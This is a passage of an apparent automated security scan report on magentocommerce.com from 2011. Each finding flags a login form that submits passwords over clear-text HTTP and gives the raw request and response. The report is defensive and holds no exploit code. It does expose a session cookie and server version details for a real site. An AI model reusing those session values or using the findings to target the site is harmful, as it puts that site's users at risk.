Path:   /media/interviews/timeout-online/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.71. http://www.magentocommerce.com/media/interviews/tvonics/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.72. http://www.magentocommerce.com/media/interviews/wander/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.73. http://www.magentocommerce.com/media/interviews/wearport/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.75. http://www.magentocommerce.com/media/screencasts  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.77. http://www.magentocommerce.com/media/screencasts/community-groups/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/configuring-tier-pricing/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176151; expires=Sat, 11-Aug-2012 15:09:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:11 GMT
Content-Length: 34931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/content-staging-and-merging/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176016; expires=Sat, 11-Aug-2012 15:06:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:56 GMT
Content-Length: 33289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.81. http://www.magentocommerce.com/media/screencasts/currency/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/currency/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176054; expires=Sat, 11-Aug-2012 15:07:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:35 GMT
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/data-exporting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176046; expires=Sat, 11-Aug-2012 15:07:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
